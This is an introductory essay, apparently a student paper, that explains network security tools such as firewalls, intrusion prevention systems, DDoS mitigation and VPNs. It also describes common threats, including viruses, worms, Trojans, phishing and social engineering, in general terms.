Network Security

Network security covers a broad range of topics and solutions for new cases every day, many business have security set in place to ensure data is kept save here are a few security devices and common threats that are in place in everyday life. One of the most basic devices is a host-based firewall which is a piece of software running on a single host that can restrict incoming and outgoing network activity for that host only. They can prevent a host from becoming infected and stop them from spreading malware to other hosts. Host-based firewalls for servers typically use rule sets similar to those of network firewalls. Some host-based firewalls for desktops and laptops also use similar rule sets, but most allow or deny activity based on lists of applications. Activity involving any application not on the lists is either denied automatically, or permitted or denied on the basis of the user's response to a prompt asking for a decision about the activity. To prevent malware incidents, organizations should configure host-based firewalls with deny-by-default rule sets for incoming traffic. A host-based firewall with antivirus capabilities can monitor inbound and outbound e-mails for signs of mass mailing viruses or worms and temporarily shut off e-mail services if such activity is detected. Accordingly, host-based firewalls for workstations that offer several types of malware prevention capabilities typically offer the best single, host-based technical control for malware threat mitigation, as long as they are configured properly and kept up-to-date at all times with the latest signatures and software updates.

A network-based intrusion prevention system (IPS) is a program that performs packet sniffing and analyzes network traffic to identify and stop suspicious activity. It receives packets, analyzes them, decides whether they should be permitted, and allows acceptable packets to pass through. The network-based IPS architecture allows some attacks to be detected on networks before they reach their intended targets. Most network-based IPS products use a combination of attack signatures and analysis of network and application protocols, which means that they compare network activity for frequently attacked applications to expected behavior to identify potentially malicious activity. Network-based IPS products are used to detect many types of malicious activity besides malware, and typically can detect only a few instances of malware by default, such as recent major worms. However, some IPS products are highly customizable, allowing administrators to create and deploy attack signatures for many major new malware threats in a matter of minutes. Network-based IPS products can be effective at stopping specific known threats, such as network service worms, and e-mail-borne worms and viruses with easily recognizable characteristics. However, network-based IPS products are generally not capable of stopping malicious mobile code or Trojan horses. Network-based IPS products might be able to detect and stop some unknown threats through application protocol analysis.

A specialized form of network-based IPS, known as DDoS attack mitigation software, attempts to stop attacks by identifying unusual network traffic flows. Although these products are primarily intended to stop DDoS attacks against an organization, they can also be used to identify worm activity and other forms of malware, as well as use of attacker tools such as backdoors and e-mail generators. DDoS attack mitigation software typically works by monitoring normal network traffic patterns, including which hosts communicate with each other using which protocols, and the typical and peak volumes of activity, to establish baselines. The software then monitors network activity to identify significant deviations from the baselines. If malware causes a particularly high volume of network traffic or uses network or application protocols that are not typically seen, DDoS attack mitigation software should be able to detect and block the activity. Another way of limiting some malware incidents is by configuring network devices to limit the maximum amount of bandwidth that can be used by particular hosts or services. Also, some types of network monitoring software can detect and report significant deviations from expected network activity, although this software typically cannot specifically label the activity as malware-related or block it.

Host-based IPS products are similar in principle and purpose to network-based IPSs, except that a host-based IPS product monitors the characteristics of a single host and the events occurring within that host. Examples of activity that might be monitored by host-based IPSs include network traffic, system logs, running processes, file access and modification, and system and application configuration changes. Host-based IPS products often use a combination of attack signatures and knowledge of expected or typical behavior to identify known and unknown attacks on systems. For example, host-based IPS products that monitor attempted changes to files can be effective at detecting viruses attempting to infect files and Trojan horses attempting to replace files, as well as the use of attacker tools, such as rootkits, that often are delivered by malware. If a host-based IPS product monitors the host's network traffic, it offers detection capabilities similar to a network-based IPS's.

A virus requires its host program to run before the virus can become active and generally requires human interaction to activate. The program “infects” computer files, usually executable programs, by inserting a copy of itself into the file. These copies are usually executed when the infected file is loaded into memory, allowing the virus to infect other files. Viruses may contain a simple message or image that consumes storage space and memory, and degrades the overall performance of a computer, or in the case of a more malicious payload, can destroy files, reformat a hard drive erasing all of the data on the disk, or cause other damage. Worms also are self-propagating; unlike viruses, they can create fully functional copies and execute themselves without user intervention. This has made worms increasingly popular with attackers, because a worm has the potential to infect many more systems in a short period of time than a virus can. Worms take advantage of known vulnerabilities and configuration weaknesses, such as unsecured Windows shares. Although some worms are intended mainly to waste system and network resources, many worms damage systems by installing backdoors, perform DDoS attacks against other hosts, or perform other malicious acts. A Trojan horse, once delivered to its host and executed, might be activated at any time, either by remote control, by a timer mechanism, or through detecting certain events on the host. A Trojan horse may enter a user's computer by presenting itself as an attractive tool of some sort, which the user intentionally downloads and installs, unaware of its ulterior purpose. Trojan horses typically build in the functionality of key logging software and other spyware and a range of other functions to disable system security.

A VPN works by using shared public networks while maintaining privacy through security procedures and protocols that encrypt communications between two end points. To provide an additional level of security, a VPN can encrypt not only the data, but also the originating and receiving network addresses. There are two main VPN technologies, which differ in their methods of encrypting data for secure transmission over Internet connections. The first method is based on tunneling protocols that encrypt packets at the sending end and decrypt them at the receiving end. This process is commonly referred to as encapsulation, because the original, unsecured packet is placed within another packet that has been secured by encryption. The encapsulated packets are then sent through a “tunnel” that cannot be traveled by data that have not been properly encrypted.

Phishing refers to a social engineering attack, where someone misrepresents their identity or authority in order to induce another person to provide personally identifiable information over the internet. Internet scammers use e-mail bait to phish for passwords and personal financial data from the "sea" of Internet users. Some common phishing scams involve e-mails that purport to be from a financial institution, Internet service provider, or other trusted company claiming that a person’s records have been lost or their account compromised. The e-mail directs the person to a website that mimics the legitimate business’ website and asks the person to enter a credit card number so the records or account can be restored. In fact, the e-mail or website is controlled by a third party who is attempting to extract information that will be used in identity theft or other crimes.

Social engineering is another and it refers to techniques designed to fool human beings into providing information or taking an action which leads to the subsequent breach in information systems security. Humans are a weak link in the security chain, and this concept has been exploited by criminals in both the physical and cyber worlds. Email, web browser, and instant messaging applications are some of the more commonly used communications channels for delivering social engineering attacks. Network security covers a broad range of topics and solutions for new cases every day, many business have security set in place to ensure data is kept save here are a few security devices and common threats that are in place in everyday life.